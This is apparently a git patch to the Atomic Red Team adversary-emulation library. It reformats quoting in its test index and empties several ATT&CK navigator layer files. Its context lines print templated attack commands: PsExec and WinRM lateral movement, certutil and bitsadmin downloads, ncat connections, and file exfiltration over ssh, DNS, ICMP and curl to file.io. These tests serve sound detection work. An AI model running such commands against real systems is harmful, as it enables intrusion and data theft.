Remote Desktop Application over Powershell - ' +' supported_platforms: - windows input_arguments: @@ -66946,7 +66946,7 @@ lateral-movement: auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 description: 'Changing RDP Port to Non Standard Port via Command_Prompt - ' +' supported_platforms: - windows input_arguments: @@ -67227,7 +67227,7 @@ lateral-movement: auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 description: 'Connecting To Remote Shares - ' +' supported_platforms: - windows input_arguments: @@ -67251,13 +67251,13 @@ lateral-movement: command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" - ' +' name: command_prompt - name: Map Admin Share PowerShell auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 description: 'Map Admin share utilizing PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -67276,14 +67276,14 @@ lateral-movement: executor: command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} - ' +' name: powershell - name: Copy and Execute File with PsExec auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf description: 'Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). - ' +' supported_platforms: - windows input_arguments: @@ -67304,10 +67304,10 @@ lateral-movement: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) - ' +' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -67337,7 +67337,7 @@ lateral-movement: command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 - ' +' name: command_prompt elevation_required: true T1021.004: @@ -67568,7 +67568,7 @@ lateral-movement: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. - ' +' supported_platforms: - windows input_arguments: @@ -67584,10 +67584,10 @@ lateral-movement: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) - ' +' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -67880,7 +67880,7 @@ lateral-movement: executor: command: 'Enable-PSRemoting -Force - ' +' name: powershell elevation_required: true - name: Invoke-Command @@ -67903,7 +67903,7 @@ lateral-movement: executor: command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} - ' +' name: powershell - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d @@ -68264,7 +68264,7 @@ command-and-control: "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} - ' +' name: powershell - name: DNS Regular Beaconing auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 @@ -69062,7 +69062,7 @@ command-and-control: auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 description: 'Utilize rsync to perform a remote file copy (push) - ' +' supported_platforms: - linux - macos @@ -69086,13 +69086,13 @@ command-and-control: executor: command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} - ' +' name: bash - name: rsync remote file copy (pull) auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f description: 'Utilize rsync to perform a remote file copy (pull) - ' +' supported_platforms: - linux - macos @@ -69116,13 +69116,13 @@ command-and-control: executor: command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} - ' +' name: bash - name: scp remote file copy (push) auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 description: 'Utilize scp to perform a remote file copy (push) - ' +' supported_platforms: - linux - macos @@ -69146,13 +69146,13 @@ command-and-control: executor: command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path} - ' +' name: bash - name: scp remote file copy (pull) auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 description: 'Utilize scp to perform a remote file copy (pull) - ' +' supported_platforms: - linux - macos @@ -69176,13 +69176,13 @@ command-and-control: executor: command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path} - ' +' name: bash - name: sftp remote file copy (push) auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e description: 'Utilize sftp to perform a remote file copy (push) - ' +' supported_platforms: - linux - macos @@ -69206,13 +69206,13 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}'' - ' +' name: bash - name: sftp remote file copy (pull) auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef' description: 'Utilize sftp to perform a remote file copy (pull) - ' +' supported_platforms: - linux - macos @@ -69236,14 +69236,14 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path} - ' +' name: bash - name: certutil download (urlcache) auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 description: 'Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! - ' +' supported_platforms: - windows input_arguments: @@ -69258,17 +69258,17 @@ command-and-control: executor: command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} - ' +' cleanup_command: 'del #{local_path} >nul 2>&1 - ' +' name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b description: 'Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! - ' +' supported_platforms: - windows input_arguments: @@ -69290,7 +69290,7 @@ command-and-control: cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Windows - BITSAdmin BITS Download auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b @@ -69316,7 +69316,7 @@ command-and-control: command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} - ' +' name: command_prompt - name: Windows - PowerShell Download auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 @@ -69338,17 +69338,17 @@ command-and-control: command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") - ' +' cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: OSTAP Worming Activity auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad description: 'OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. - ' +' supported_platforms: - windows input_arguments: @@ -69425,7 +69425,7 @@ command-and-control: auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: 'Download a remote file using the whois utility - ' +' supported_platforms: - linux - macos @@ -69453,29 +69453,29 @@ command-and-control: dependencies: - description: 'The whois and timeout commands must be present - ' +' prereq_command: 'which whois && which timeout - ' +' get_prereq_command: 'echo "Please install timeout and the whois package" - ' +' executor: name: sh elevation_required: false command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: File Download via PowerShell auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 description: 'Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows input_arguments: @@ -69509,7 +69509,7 @@ command-and-control: name: command_prompt command: 'finger base64_filedata@#{remote_host} - ' +' - name: Download a file with IMEWDBLD.exe auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2 description: | @@ -69557,10 +69557,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. - ' +' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -69603,10 +69603,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. - ' +' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -69615,13 +69615,13 @@ command-and-control: Remove-Item $env:temp\curl.zip - description: 'A file must be created to upload - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "This is an Atomic Test File" > #{file_path} - ' +' executor: command: | #{curl_path} -T #{file_path} #{remote_destination} @@ -69719,7 +69719,7 @@ command-and-control: executor: command: 'export #{proxy_scheme}_proxy=#{proxy_server} - ' +' cleanup_command: | unset http_proxy unset https_proxy @@ -70108,10 +70108,10 @@ command-and-control: dependencies: - description: 'ncat.exe must be available at specified location (#{ncat_exe}) - ' +' prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null @@ -70125,7 +70125,7 @@ command-and-control: executor: command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port} - ' +' name: powershell - name: Powercat C2 auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e @@ -70274,13 +70274,13 @@ command-and-control: executor: command: 'Test-NetConnection -ComputerName #{domain} -port #{port} - ' +' name: powershell - name: Testing usage of uncommonly used port auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 description: 'Testing uncommonly used port utilizing telnet. - ' +' supported_platforms: - linux - macos @@ -70296,7 +70296,7 @@ command-and-control: executor: command: 'telnet #{domain} #{port} - ' +' name: sh T1102.003: technique: @@ -70538,7 +70538,7 @@ command-and-control: -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content } - ' +' name: powershell - name: DNS over HTTPS Regular Beaconing auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b @@ -70728,7 +70728,7 @@ command-and-control: and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70749,7 +70749,7 @@ command-and-control: and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70768,7 +70768,7 @@ command-and-control: and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70788,7 +70788,7 @@ command-and-control: and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70874,7 +70874,7 @@ command-and-control: auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 description: 'Utilizing a common technique for posting base64 encoded data. - ' +' supported_platforms: - macos - linux @@ -71180,7 +71180,7 @@ command-and-control: - description: "Curl must be installed on system \n" prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71385,7 +71385,7 @@ exfiltration: auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a description: 'Take a file/directory, split it into 5Mb chunks - ' +' supported_platforms: - macos - linux @@ -71404,12 +71404,12 @@ exfiltration: prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1 - ' +' executor: command: | cd #{folder_path}; split -b 5000000 #{file_name} @@ -71417,7 +71417,7 @@ exfiltration: cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; - ' +' name: sh T1048: technique: @@ -71496,7 +71496,7 @@ exfiltration: executor: command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz - ' +' name: sh - name: Exfiltration Over Alternative Protocol - SSH auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 @@ -71526,7 +71526,7 @@ exfiltration: command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} ''cat > /Users.tar.gz.enc'' - ' +' name: sh - name: DNSExfiltration (doh) auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48 @@ -71562,20 +71562,20 @@ exfiltration: description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers. type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module}) - ' +' prereq_command: 'if (Test-Path #{ps_module}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile #{ps_module} - ' +' executor: command: | Import-Module #{ps_module} @@ -71639,7 +71639,7 @@ exfiltration: auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 description: 'Exfiltrate data HTTPS using curl to file share site file.io - ' +' supported_platforms: - windows input_arguments: @@ -71655,10 +71655,10 @@ exfiltration: dependencies: - description: 'Curl must be installed on system. - ' +' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71674,7 +71674,7 @@ exfiltration: auto_generated_guid: 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 description: 'Exfiltrate data HTTPS using curl to file share site file.io - ' +' supported_platforms: - macos - linux @@ -71775,7 +71775,7 @@ exfiltration: auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932 description: 'Exfiltrates a file present on the victim machine to the C2 server. - ' +' supported_platforms: - windows input_arguments: @@ -72028,13 +72028,13 @@ exfiltration: in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } - ' +' name: powershell - name: Exfiltration Over Alternative Protocol - DNS auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 description: 'Exfiltration of specified file over DNS protocol. - ' +' supported_platforms: - linux executor: @@ -72079,7 +72079,7 @@ exfiltration: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} - ' +' name: powershell input_arguments: input_file: @@ -72482,7 +72482,7 @@ initial-access: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -72517,20 +72517,20 @@ initial-access: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1195.003: technique: external_references: @@ -72768,7 +72768,7 @@ initial-access: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -72779,10 +72779,10 @@ initial-access: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1078.002: @@ -73096,7 +73096,7 @@ initial-access: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list - ' +' supported_platforms: - windows input_arguments: @@ -73109,12 +73109,12 @@ initial-access: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" - ' +' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -73483,7 +73483,7 @@ initial-access: cleanup_command: 'Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore - ' +' - name: Word spawned a command shell and used an IP address in the command line auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f description: | @@ -73495,7 +73495,7 @@ initial-access: jse_path: description: 'Path for the macro to write out the "malicious" .jse file - ' +' type: String default: C:\Users\Public\art.jse ms_product: @@ -73506,7 +73506,7 @@ initial-access: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -73517,7 +73517,7 @@ initial-access: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -73526,7 +73526,7 @@ initial-access: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore - ' +' name: powershell T1566.002: technique: From 5b28237584d74d716f2e4a337c2946ee51dfe295 Mon Sep 17 00:00:00 2001 From: Jose Enrique Hernandez Date: Mon, 31 Jan 2022 17:59:15 -0500 Subject: [PATCH 10/11] Add links to navigator (#1752) * added link object, removed comments * only adds links when parent technique actually has a yaml Co-authored-by: Carrie Roberts --- .../art-navigator-layer-azure-ad.json | 2 +- .../art-navigator-layer-containers.json | 1 - .../art-navigator-layer-google-workspace.json | 2 +- .../art-navigator-layer-iaas.json | 2 +- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-macos.json | 2 +- .../art-navigator-layer-office-365.json | 1 - .../art-navigator-layer-windows.json | 1 - .../art-navigator-layer.json | 1 - atomics/Indexes/index.yaml | 4140 ++++++++--------- bin/generate-atomic-docs.rb | 22 +- 11 files changed, 2095 insertions(+), 2081 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json index 0ccf8d24..8b137891 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]} \ No newline at end of file + diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json index 69180529..e69de29b 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json @@ -1 +0,0 @@ -{"version":"4.3","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json index 5d57adec..8b137891 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]} \ No newline at end of file + diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json index 42be7106..8b137891 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]} \ No newline at end of file + diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index ff6a3888..8b137891 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View 